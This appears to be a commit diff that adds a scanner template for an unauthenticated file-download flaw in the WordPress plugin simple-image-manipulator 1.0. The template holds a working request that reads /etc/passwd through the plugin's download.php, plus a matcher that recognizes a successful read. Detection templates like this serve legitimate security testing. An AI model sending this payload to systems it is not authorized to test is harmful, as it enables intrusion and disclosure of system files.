Create wp-simple-image-manipulator-lfi.yaml
parent
bcbe4dabff
commit
fc660ec0db
|
@ -0,0 +1,26 @@
|
|||
id: wp-simple-image-manipulator-lfi
|
||||
|
||||
info:
|
||||
name: Remote file download in simple-image-manipulator v1.0 wordpress plugin
|
||||
author: dhiyaneshDK
|
||||
severity: high
|
||||
description: In ./simple-image-manipulator/controller/download.php no checks are made to authenticate user or sanitize input when determining file location.
|
||||
reference:
|
||||
- https://packetstormsecurity.com/files/132962/WordPress-Simple-Image-Manipulator-1.0-File-Download.html
|
||||
tags: wordpress,wp-plugin,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue